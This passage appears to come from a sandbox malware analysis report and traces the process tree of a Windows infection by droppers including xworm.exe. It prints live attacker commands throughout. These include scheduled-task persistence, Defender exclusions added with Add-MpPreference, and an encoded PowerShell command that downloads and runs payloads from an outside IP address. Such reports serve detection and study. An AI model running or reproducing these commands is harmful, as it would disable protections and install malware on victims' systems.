    "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2312
- - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
    "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2044
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4836
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VtAjv4VqSMPH.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4080
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:1752
    - - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3076
    - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1944
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3896
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iUODShiieUtU.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3208
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:3348
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2992
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4288
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y5IJKLI6lJTC.bat" "
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4684
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:5044
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1816
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1640
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JGpDffi2eHvm.bat" "
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:2292
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:2796
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3616
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2640
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:560
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vO8GlXhROXHb.bat" "
        12⤵
        Suspicious use of WriteProcessMemory
        
        PID:1400
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:1936
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2708
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2836
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        14⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fKoYDNBoxPpF.bat" "
        14⤵
        
        PID:1240
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        15⤵
        
        PID:1964
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4940
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        15⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3992
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        16⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OVfdBzjK3mKe.bat" "
        16⤵
        
        PID:1684
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        17⤵
        
        PID:796
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        17⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1248
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        17⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2100
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        18⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5kUW3drUEbdR.bat" "
        18⤵
        
        PID:2040
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        19⤵
        
        PID:1576
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        19⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1176
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        19⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3776
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        20⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zFBnMHUIelN7.bat" "
        20⤵
        
        PID:2096
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        21⤵
        
        PID:2352
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        21⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4908
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        21⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1764
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        22⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AYFFwwsp8m4G.bat" "
        22⤵
        
        PID:3548
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        23⤵
        
        PID:4896
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        23⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2720
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        23⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4876
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        24⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1104
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CfJLwRTLI98a.bat" "
        24⤵
        
        PID:4452
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        25⤵
        
        PID:3084
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        25⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2024
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        25⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4948
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        26⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jPWDY4Jb7kuB.bat" "
        26⤵
        
        PID:3440
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        27⤵
        
        PID:5084
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        27⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3808
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        27⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1948
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        28⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3840
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bh3MVoksi4a2.bat" "
        28⤵
        
        PID:4940
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        29⤵
        
        PID:3108
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        29⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4884
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        29⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4060
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        30⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fcNswAQDsBQU.bat" "
        30⤵
        
        PID:2796
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        31⤵
        
        PID:3300
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        31⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3756
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        31⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:436
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        32⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hRsgKnM1FTpU.bat" "
        32⤵
        
        PID:1684
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        33⤵
        
        PID:4556
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        33⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3728
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        33⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4648
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        34⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4344
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8pFVDaMCbOuG.bat" "
        34⤵
        
        PID:4868
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        35⤵
        
        PID:2040
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        35⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2792
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        35⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4500
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        36⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Zg686dHdfK5Z.bat" "
        36⤵
        
        PID:3588
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        37⤵
        
        PID:1376
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        37⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4208
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        37⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:456
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        38⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C1ING1vTkVIt.bat" "
        38⤵
        
        PID:1764
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        39⤵
        
        PID:3904
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        39⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3820
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        39⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4236
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        40⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1708
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\J7mTB77sPQEO.bat" "
        40⤵
        
        PID:5020
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        41⤵
        
        PID:1828
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        41⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3372
- C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  PID:3276
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Steam.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Steam.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2064
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Steam" /tr "C:\Users\Admin\AppData\Roaming\Steam.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2548
- C:\Users\Admin\AppData\Local\Temp\Files\windowshost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\windowshost.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3456
- C:\Users\Admin\AppData\Local\Temp\Files\xworm.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\xworm.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:3692
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3544
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeQBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABlAHIAcgBvAHIAIQAgAEYAaQBsAGUAIABtAHUAcwB0ACAAYgBlACAAcwB0AGEAcgB0AGUAZAAgAGEAcwAgAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAYwB1AGsAIwA+ADsAIgA7ADwAIwBsAG0AbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcQBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB5ACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AWQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAdgBqAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AGMAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB1AGIAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQApADwAIwB3AGwAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AYQB2AGQAaQBzAGEAYgBsAGUALgBiAGEAdAAnACwAIAA8ACMAZAB3AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGQAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGwAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAHYAZABpAHMALgBiAGEAdAAnACkAKQA8ACMAcABmAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMgAwADkALgAxADYAMAAuADcAMAAvAEwAaQBjAGUAbgBzAGUAQwBoAGUAYwBrAGUAcgAuAGUAeABlACcALAAgADwAIwBiAHMAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAdgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApACkAPAAjAHEAdQBzACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMAA5AC4AMQA2ADAALgA3ADAALwBQAEwAVgAuAGUAeABlACcALAAgADwAIwBrAGcAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAagB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAYgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATABUAGUAcwB0AC4AZQB4AGUAJwApACkAPAAjAGEAaQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAeQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHEAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQA8ACMAcwB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAZwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAdgBkAGkAcwAuAGIAYQB0ACcAKQA8ACMAagBpAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQByAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwB4AHcAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGMAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBnAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAFQAZQBzAHQALgBlAHgAZQAnACkAPAAjAHoAZgBsACMAPgA="
      4⤵
      Blocklisted process makes network request
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2080
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#vmm#>[System.Windows.Forms.MessageBox]::Show('Injection error! File must be started as Administrator!','','OK','Error')<#cuk#>;
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2656
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 248
    3⤵
    - Program crash
    PID:5028
- C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
